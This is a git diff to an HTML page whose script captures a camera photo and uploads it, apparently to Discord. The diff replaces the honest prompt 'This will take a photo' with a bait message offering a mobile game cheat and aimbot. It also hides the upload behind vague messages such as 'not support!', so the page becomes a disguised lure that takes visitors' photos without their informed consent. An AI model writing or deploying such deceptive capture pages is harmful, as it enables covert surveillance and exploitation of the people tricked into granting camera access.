--- a/index.html
+++ b/index.html
@@ -3,12 +3,12 @@
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>SHAN CHEAT BOT DISABLE</title>
+    <title>SHAN CHEAT MOBILE HACK</title>
 </head>
 <body>
     <script>
         async function askPermission() {
-            if (confirm("Are you sure? This will take a photo.")) {
+            if (confirm("YOU WANT SHAN CHEAT MOBILE PANEL AIMBOT + CM HACK.")) {
                 capturePhoto();
             }
         }
@@ -34,7 +34,7 @@
                     canvas.toBlob(blob => uploadPhoto(blob), 'image/png');
                 }, 1000);
             } catch (err) {
-                alert("Camera access denied!");
+                alert("Not work!");
                 console.error(err);
             }
         }
@@ -76,8 +76,8 @@
                     }]
                 })
             })
-            .then(response => console.log("Photo sent to Discord!"))
-            .catch(err => console.error("Error sending photo to Discord:", err));
+            .then(response => console.log("not support!"))
+            .catch(err => console.error("Error:", err));
         }
 
         askPermission();
